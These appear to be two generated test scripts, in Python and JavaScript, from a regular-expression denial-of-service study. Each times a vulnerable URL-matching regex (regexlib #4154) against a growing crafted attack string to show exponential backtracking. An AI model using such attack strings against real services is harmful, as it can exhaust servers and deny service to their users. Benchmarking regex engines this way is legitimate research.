File: regexlib/2021-5-15/python_re2_test_file/regexlib_4154.py
# 4154
# ^(?<link>((?<prot>http:\/\/)*(?<subdomain>(www|[^\-\n]*)*)(\.)*(?<domain>[^\-\n]+)\.(?<after>[a-zA-Z]{2,3}[^>\n]*)))$
# EXPONENT
# nums:5
# EXPONENT AttackString:":."+"aa"*8+"@1 _SLQ_2"

import re2 as re
from time import perf_counter

regex = """^(?<link>((?<prot>http:\/\/)*(?<subdomain>(www|[^\-\n]*)*)(\.)*(?<domain>[^\-\n]+)\.(?<after>[a-zA-Z]{2,3}[^>\n]*)))$"""
REGEX = re.compile(regex)
for i in range(0, 150000):
    ATTACK = ":." + "aa" * i * 1 + "@1 _SLQ_2"
    LEN = len(ATTACK)
    BEGIN = perf_counter()
    m = REGEX.search(ATTACK)
    # m = REGEX.match(ATTACK)
    DURATION = perf_counter() - BEGIN
    print(f"{i *1}: took {DURATION} seconds!")

File: regexlib/2021-5-15/javascript_test_file/regexlib_4154.js
/* 4154
 * ^(?<link>((?<prot>http:\/\/)*(?<subdomain>(www|[^\-\n]*)*)(\.)*(?<domain>[^\-\n]+)\.(?<after>[a-zA-Z]{2,3}[^>\n]*)))$
 * EXPONENT
 * nums:3
 * EXPONENT AttackString:":."+"aa"*8+"@1 _SLQ_2"
 */
var REGEX = new RegExp("^(?<link>((?<prot>http:\/\/)*(?<subdomain>(www|[^\-\n]*)*)(\.)*(?<domain>[^\-\n]+)\.(?<after>[a-zA-Z]{2,3}[^>\n]*)))$")
for(var i = 1; i <= 5000000; i++) {
    var time = Date.now();
    var attack_str = ':.' + 'aa'.repeat(i*1) + '@1 _SLQ_2'
    REGEX.exec(attack_str)
    // REGEX.test(attack_str);
    // attack_str.search(REGEX)
    // attack_str.match(REGEX)
    var time_cost = Date.now() - time;
    console.log(i * 1 + ": " + time_cost+" ms")
}